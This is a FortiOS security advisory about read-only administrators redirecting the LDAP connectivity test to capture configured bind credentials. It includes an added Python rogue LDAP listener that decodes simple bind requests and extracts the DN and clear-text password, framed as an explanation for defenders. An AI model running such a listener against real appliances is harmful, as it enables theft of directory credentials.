PSIRT Advisory

Read-only admins can obtain LDAP credentials configured in FortiGate using LDAP test connectivity feature

Summary

FortiGate read-only administrators can point an LDAP server connectivity test request at a rogue LDAP server of their choosing instead of at the configured one, and thereby obtain the LDAP bind credentials (bind DN and password) configured on the FortiGate, since the FortiGate authenticates to whatever server the test targets.
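As an added example (not part of this advisory and not Fortinet's code), the following shows what the rogue LDAP server at the far end of a redirected connectivity test sees, and why choosing the target server is enough to recover the credentials. It assumes the appliance performs an LDAPv3 simple bind over plain TCP (the advisory does not state the bind method; a simple bind is the case in which the bind password travels in clear), and the DN, password and port numbers are constructed for the example.

```python
"""Rogue LDAP listener: decode an LDAPv3 simple BindRequest and answer it.

Added example, not Fortinet's code.  Assumption: the client (standing in for
the appliance's LDAP connectivity test) performs a *simple* bind over plain
TCP, so the bind DN and password arrive in clear in the first message.
"""
import socket
import threading


def encode_int(n):
    """BER INTEGER content for a non-negative int (leading 0x00 when MSB is set)."""
    return n.to_bytes(n.bit_length() // 8 + 1, "big")


def encode_tlv(tag, value):
    """BER-encode one tag/length/value element (definite length form)."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def ber_tlv(buf, i):
    """Decode the element at buf[i]; return (tag, value_bytes, index_after)."""
    tag = buf[i]
    first = buf[i + 1]
    if first < 0x80:
        length, j = first, i + 2
    else:
        n = first & 0x7F
        length, j = int.from_bytes(buf[i + 2:i + 2 + n], "big"), i + 2 + n
    return tag, buf[j:j + length], j + length


def build_simple_bind(message_id, dn, password, version=3):
    """LDAPMessage { messageID, BindRequest [APPLICATION 0] with simple auth [0] }."""
    bind = (encode_tlv(0x02, encode_int(version))   # version INTEGER
            + encode_tlv(0x04, dn.encode())         # name LDAPDN
            + encode_tlv(0x80, password.encode()))  # authentication [0] simple (clear)
    return encode_tlv(0x30, encode_tlv(0x02, encode_int(message_id)) + encode_tlv(0x60, bind))


def parse_simple_bind(msg):
    """Return (message_id, version, dn, password) from a simple BindRequest.

    Raises ValueError for anything that is not a simple bind (e.g. SASL [3]).
    """
    tag, body, _ = ber_tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, i = ber_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, bind, _ = ber_tlv(body, i)
    if tag != 0x60:
        raise ValueError("not a BindRequest")
    _, ver, i = ber_tlv(bind, 0)
    _, dn, i = ber_tlv(bind, i)
    tag, auth, _ = ber_tlv(bind, i)
    if tag != 0x80:
        raise ValueError("not a simple bind; password not sent in clear")
    return (int.from_bytes(mid, "big"), int.from_bytes(ver, "big"), dn.decode(), auth.decode())


def bind_response(message_id, result_code=49):
    """BindResponse [APPLICATION 1]; 49 = invalidCredentials, so the client closes cleanly."""
    result = encode_tlv(0x0A, bytes([result_code])) + encode_tlv(0x04, b"") + encode_tlv(0x04, b"")
    return encode_tlv(0x30, encode_tlv(0x02, encode_int(message_id)) + encode_tlv(0x61, result))


def start_rogue_ldap(host="127.0.0.1", port=0):
    """One-shot rogue listener in a background thread.

    Returns (bound_port, captured, thread).  When the thread finishes,
    captured["bind"] holds (message_id, version, dn, password) or
    captured["error"] holds the decode/socket error.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    srv.settimeout(5)
    bound_port = srv.getsockname()[1]
    captured = {}

    def run():
        try:
            conn, _ = srv.accept()
            with conn:
                conn.settimeout(5)
                data = conn.recv(4096)  # a BindRequest fits in one segment
                captured["bind"] = parse_simple_bind(data)
                conn.sendall(bind_response(captured["bind"][0]))
        except (OSError, ValueError) as exc:
            captured["error"] = exc
        finally:
            srv.close()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return bound_port, captured, t


def send_bind(port, dn, password, message_id=1, host="127.0.0.1"):
    """Client side, standing in for the appliance's test: connect, bind, return the raw reply."""
    with socket.create_connection((host, port), timeout=5) as c:
        c.sendall(build_simple_bind(message_id, dn, password))
        return c.recv(4096)


# Constructed sample: messageID 1, version 3, DN "cn=fgt,dc=example,dc=com", password "s3cretPW".
SAMPLE_BIND = (b"\x30\x2c\x02\x01\x01\x60\x27\x02\x01\x03"
               b"\x04\x18cn=fgt,dc=example,dc=com\x80\x08s3cretPW")

if __name__ == "__main__":
    port, captured, t = start_rogue_ldap()
    send_bind(port, "cn=fgt-svc,ou=svc,dc=example,dc=com", "Hunter2!", message_id=3)
    t.join(5)
    print("rogue server captured:", captured)
```

The point for defenders is in `parse_simple_bind`: nothing about the request lets the rogue end know it was not the real directory, so the only effective control is on the appliance side (the test may only ever target the already-configured server, and the bind account should be a low-privilege read-only directory user whose password is rotated after any exposure).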

Impact

Improper Access Control

Affected Products

FortiOS 6.0.2 and earlier

Solutions

Upgrade to FortiOS 6.0.3 or to the upcoming 6.2.0 release.

Acknowledgement

Fortinet is pleased to thank Julio Engels Ureña Martinez for reporting this vulnerability under responsible disclosure.